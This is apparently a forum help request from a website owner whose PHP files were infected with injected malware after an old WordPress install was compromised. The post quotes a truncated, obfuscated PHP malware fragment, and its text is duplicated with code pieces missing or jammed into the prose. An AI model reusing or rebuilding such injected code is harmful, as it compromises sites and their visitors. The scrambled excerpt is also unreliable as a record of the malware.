Malware code in PHP files
Posted: Tue Sep 02, 2014 9:14 am
Hi,
An old WordPress install was left unattended on my hosting account and became a vulnerability. So someone uploaded malware. The malware injected this code and spread to all my php files on every website I host!! Fortunately I wasn't using all of them, so just deleted all the installs except for two important websites.
This is a sample of the code found in all the headers:
..... It also duplicated some code at the footer of each file.
I downloaded a copy of my website to my Windows PC and want to know if there is a free app that I can use to easily remove the code or malware from my files? I spent hours manually deleting the malware code, but my wp admin area does not want to work - it shows: on the screen. The website is working OK but the header is also displaying: but at least the site is browse-able.
How can I get the site working again?
Thank you,
An old WordPress install was left unattended on my hosting account and became a vulnerability. So someone uploaded malware. The malware injected this code and spread to all my php files on every website I host!! Fortunately I wasn't using all of them, so just deleted all the installs except for two important websites.
This is a sample of the code found in all the headers:
Code: Select all
<?php $cnnaijatpd = '5c%x78256<.msv%x5c%x7860ftsbqA7I downloaded a copy of my website to my Windows PC and want to know if there is a free app that I can use to easily remove the code or malware from my files? I spent hours manually deleting the malware code, but my wp admin area does not want to work - it shows:
Code: Select all
) { return $id; } ?> Code: Select all
) { return $id; } ?> return $output; } ?>How can I get the site working again?
Thank you,